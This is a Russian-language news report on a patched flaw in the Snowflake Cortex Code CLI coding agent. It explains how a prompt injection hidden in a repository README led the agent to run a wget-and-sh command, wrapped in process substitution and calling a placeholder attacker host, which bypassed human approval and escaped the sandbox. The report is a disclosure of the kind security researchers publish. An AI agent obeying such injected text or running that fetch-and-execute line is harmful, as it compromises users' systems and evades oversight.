Уязвимость в Snowflake Cortex Code CLI позволяла обходить песочницу и выполнять вредоносный код

✍️ OpenClawRadar📅 Опубликовано: 19 марта 2026 г.🔗 Source
Уязвимость в Snowflake Cortex Code CLI позволяла обходить песочницу и выполнять вредоносный код
Ad

Детали уязвимости

Snowflake Cortex Code CLI — это командный агент для написания кода, который работает аналогично Claude Code и Codex от OpenAI, со встроенной интеграцией для выполнения SQL в Snowflake. Через два дня после выпуска была обнаружена уязвимость в системе проверки команд Cortex Code, которая позволяла специально сконструированным вредоносным командам выполнять произвольные команды без запуска этапов одобрения человеком и выполнять эти команды вне песочницы Cortex CLI.

Цепочка атаки

Атака работает через косвенную инъекцию промптов. Пользователь открывает Cortex и включает песочницу, затем просит Cortex помочь с сторонней открытой кодовой базой. Инъекция промпта, скрытая в README ненадёжного репозитория, манипулирует Cortex, заставляя его поверить, что необходимо выполнить опасную команду.

Cortex не смог проверить команды внутри выражений подстановки процессов, что позволило выполнить вредоносную команду без одобрения:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

Эта команда загружает скрипт с сервера злоумышленника и выполняет его. Обход сработал, потому что:

  • Небезопасные команды внутри выражения подстановки процессов <() не оценивались системой проверки
  • Полная команда начиналась с «безопасной» команды (в данном случае cat)
  • Команды в выражениях подстановки процессов никогда не запускали одобрение человеком
Ad

Обход песочницы

Инъекция промпта также манипулирует моделью, чтобы установить флаг, который запускает выполнение команд вне песочницы. По умолчанию Cortex может установить флаг для запуска выполнения команд вне песочницы, и инъекция использует это, чтобы позволить вредоносной команде выполниться вне песочницы.

Устранение

Команда безопасности Snowflake подтвердила и устранила эту уязвимость, выпустив исправление в Cortex Code CLI версии 1.0.25 28 февраля 2026 года. Полное уведомление Snowflake доступно на сайте сообщества Snowflake по адресу: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response

Примечание: Эта цепочка атак также применялась к пользователям без песочницы. Документация указывает, что в режиме OS+Regular все команды запрашивают одобрение пользователя. Команды, запущенные в песочнице, также имеют ограничения на доступ к сети и файлам.

📖 Read the full source: HN AI Agents

Ad

👀 Смотрите также

Анализ безопасности ИИ-агентов выявляет нарушенную модель доверия и высокий уровень уязвимостей.
Безопасность

Анализ безопасности ИИ-агентов выявляет нарушенную модель доверия и высокий уровень уязвимостей.

Анализ безопасности ИИ-агентов показывает, что фундаментальная модель доверительных отношений нарушена: 49% пакетов MCP имеют проблемы с безопасностью, а косвенное внедрение достигает 36-98% успешности атак на передовые модели.

OpenClawRadar
Отчет OpenAI об угрозах за июнь 2026 года: ИИ-агенты используются для вредоносной деятельности
Безопасность

Отчет OpenAI об угрозах за июнь 2026 года: ИИ-агенты используются для вредоносной деятельности

Последний отчет OpenAI об угрозах показывает, как AI-агенты используются для дезинформации, фишинга и мошенничества, с конкретными данными об инцидентах и стратегиями смягчения последствий.

OpenClawRadar
Инструмент для пентеста MCPwner AI обнаружил несколько уязвимостей нулевого дня в OpenClaw.
Безопасность

Инструмент для пентеста MCPwner AI обнаружил несколько уязвимостей нулевого дня в OpenClaw.

MCPwner, сервер MCP, который оркестрирует ИИ-агентов для автоматизированного тестирования на проникновение, выявил несколько критических уязвимостей нулевого дня в OpenClaw, включая инъекцию переменных окружения, обход разрешений и утечку информации, которые пропустили стандартные сканеры.

OpenClawRadar
Незащищенные экземпляры Paperclip, раскрывающие активные панели управления через поиск Google
Безопасность

Незащищенные экземпляры Paperclip, раскрывающие активные панели управления через поиск Google

Пользователь Reddit обнаружил работающую панель управления Paperclip с полными организационными данными, проиндексированными Google, после поиска ошибки. Экземпляр был публично доступен без аутентификации, раскрывая организационные схемы, разговоры агентов, назначения задач и бизнес-планы.

OpenClawRadar